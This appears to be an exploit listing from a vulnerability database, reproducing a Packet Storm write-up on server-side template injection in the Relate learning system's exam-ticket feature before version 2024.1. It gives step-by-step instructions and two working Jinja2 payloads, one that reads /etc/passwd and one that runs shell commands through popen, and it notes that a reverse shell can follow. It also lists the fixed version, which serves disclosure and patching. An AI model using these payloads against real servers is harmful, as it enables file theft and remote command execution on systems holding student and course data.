Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Relate Learning And Teaching System SSTI / Remote Code Execution

🗓️ 24 Apr 2024 00:00:00Reported by kai6uType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 316 Views

SSTI in Relate Learning And Teaching system allows RCE via Batch-Issue Exam Tickets feature

Code
`# Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE  
# Date: 24/04/2024  
# Exploit Author: kai6u  
# Vendor Homepage: https://github.com/inducer/  
# Software Link: https://github.com/inducer/relate  
# Affected Version:before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)  
# Fixed Version:2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)  
# Tested on: Ubuntu 22.04  
# Summary:  
SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system  
  
# Description:  
* 【Prerequisite】  
* The attacker has stolen the privilege to issue exam tickets. For example, attacker is logged in as an course administrator.  
  
* SSTI is in the `Batch-Issue Exam Tickets` feature, which allows user to specify the format in which tickets are distributed and uses a Django (Jinja2) template internally.  
  
1) First, the attacker uses the Ticket Format feature to plant the following payload.  
* Payload:  
* `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}`  
* Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment.  
  
2) Click an Issue Ticket including the above payload.  
* Then you will see that the contents of the `/etc/passwd` file are output at the after Ticket Code block.  
  
3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.  
* Payload:  
* `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`  
  
4) Click an Issue Ticket including the above payload.  
  
* If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.  
* An attacker can use this feature to execute reverse shell.  
  
# References  
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Apr 2024 00:00Current
7.4High risk
Vulners AI Score7.4
sstircerelate learning and teachingexam ticketsdjangoubuntu
316